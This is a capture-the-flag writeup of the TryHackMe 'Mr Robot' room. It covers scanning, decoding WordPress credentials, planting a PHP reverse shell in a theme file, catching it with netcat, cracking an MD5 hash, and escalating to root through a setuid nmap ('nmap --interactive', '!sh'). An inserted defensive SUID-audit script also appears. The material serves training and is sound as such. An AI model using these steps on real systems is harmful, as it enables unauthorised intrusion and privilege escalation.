Ionut
TryHackMe(THM)-Mrrobot Writeup


Mr Robot CTF

Based on the Mr. Robot show, can you root this box?
Room link is here link

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Let’s start the room with basic things.

PORT SCANNING:

nmap -sV -sC -A IP
  1. Port 22 – SSH
  2. Port 80 – http
  3. Port 443 – ssl/http

Now, let's check out the webserver!

The commands displayed on this page do not give you anything useful for the box.

If you haven’t seen the show yet, I recommend you do not try these commands, as they contain spoilers!

Since this page gives us no information to work with, I ran a gobuster scan (directory search).


gobuster dir -u IP -w /usr/share/wordlists/dirb/common.txt

The hint for the first question is "Robots",
and the scan shows the file "robots.txt".


Here is the first KEY!


From this point I've found 2 ways to find the next key:

  1. The gobuster scan found a WordPress admin login page, and /robots.txt lists a file "fsocity.dic", a wordlist that could be used to brute-force the WordPress login page (this is a waste of time).

  2. There is another interesting directory -> /license


If we scroll down, we find a base64-encoded string.


We can decode it with an online base64 decoder:

https://base64.guru/converter/decode/text
ZWxsaW90OkVSMjgtMDY1Mgo= --> elliot:ER28-0652

And just like that, we have the WordPress credentials:


Now for the tricky part, and my favourite part of this room:
we need to get a reverse shell.
First go to "Appearance" - "Editor" - "Archives".


At this step, we replace the file's contents with a PHP reverse shell, which we can copy from GitHub.
PHP REVERSE SHELL


To catch the shell, listen on port 4444 (or whichever port you chose) with netcat:
NETCAT

nc -lvnp 4444

Then browse to IP/wp-content/themes/twentyfifteen/archive.php
to trigger the shell.

Woohoo, we have a shell now.

I added:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py

to get a stable (TTY) shell.

The second key is in /home/robot/, but unfortunately we don't have permission to read it.


Luckily, there is another file in the same directory containing the password hash for the robot user.

To crack this hash we use John the Ripper:

echo 'c3fcd3d76192e4007dfb496cca67e13b' > anyfilename
john --format=raw-md5 --wordlist=rockyou.txt anyfilename
john --show --format=RAW-MD5 anyfilename

> ?: abcdefghijklmnopqrstuvwxyz (this is the password)

Now, simply switch to "robot":

su robot
-and the password is **abcdefghijklmnopqrstuvwxyz**


Now it remains to find the last key, which should be in /root.
The hint is NMAP.

I used

find / -perm -u=s -type f 2>/dev/null

to find all files that have the SUID bit set.

And yep, nmap is there.

GTFOBins is, in my opinion, the best site for finding how a given SUID binary can be used to get root access.
LINK
These are the commands to obtain root access:

nmap --interactive
nmap> !sh
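A defender's counterpart to the SUID hunt above, added here as an example and not part of the original writeup: audit the setuid binaries on a host against an expected allowlist, so an out-of-place setuid nmap gets reported instead of waiting to be found by the next person with a shell. The allowlist paths and the demo directory tree are constructed assumptions, not taken from the box.

```shell
#!/bin/sh
# Added example, not code from the original writeup: audit setuid binaries on a
# host against an expected allowlist so that an out-of-place setuid binary
# (like the nmap on this box) is reported. The allowlist below is an
# illustrative assumption; a real baseline comes from a known-good build.

ALLOWLIST='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su'

# list_suid ROOT: print every regular file under ROOT with the setuid bit set
# (the same test as the writeup's find, limited to one filesystem)
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# audit_suid ROOT: print "UNEXPECTED SUID: <path>" for each setuid file whose
# path (relative to ROOT) is not an exact line of ALLOWLIST; returns 1 if any
audit_suid() {
    root=${1%/}                       # "/" becomes "", so paths stay absolute
    findings=$(list_suid "${root:-/}" | while IFS= read -r f; do
        rel=${f#"$root"}
        printf '%s\n' "$ALLOWLIST" | grep -Fqx -- "$rel" \
            || printf 'UNEXPECTED SUID: %s\n' "$rel"
    done)
    [ -n "$findings" ] || return 0
    printf '%s\n' "$findings"
    return 1
}

# make_demo_tree: build a throwaway directory with a constructed mix of setuid
# and plain files (sample data, not the real machine) and print its path
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/usr/local/bin"
    : > "$d/usr/bin/passwd";     chmod u+s "$d/usr/bin/passwd"     # expected
    : > "$d/usr/local/bin/nmap"; chmod u+s "$d/usr/local/bin/nmap" # not expected
    : > "$d/usr/bin/ls"                                            # no setuid
    printf '%s\n' "$d"
}

# Usage on the demo tree (run "audit_suid /" as root to audit a live host):
#   tree=$(make_demo_tree); audit_suid "$tree"; rm -rf "$tree"
```

Run this on a regular schedule and diff the output against the previous run; a new setuid binary appearing outside the baseline is exactly the kind of change that turned this box's nmap into a root shell.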


Finally, we have the last key!

It's a pretty old challenge, but a very good one. I hope you learned a lot from this writeup.
For any questions, feel free to drop a comment, and follow me here for more CTF writeups.
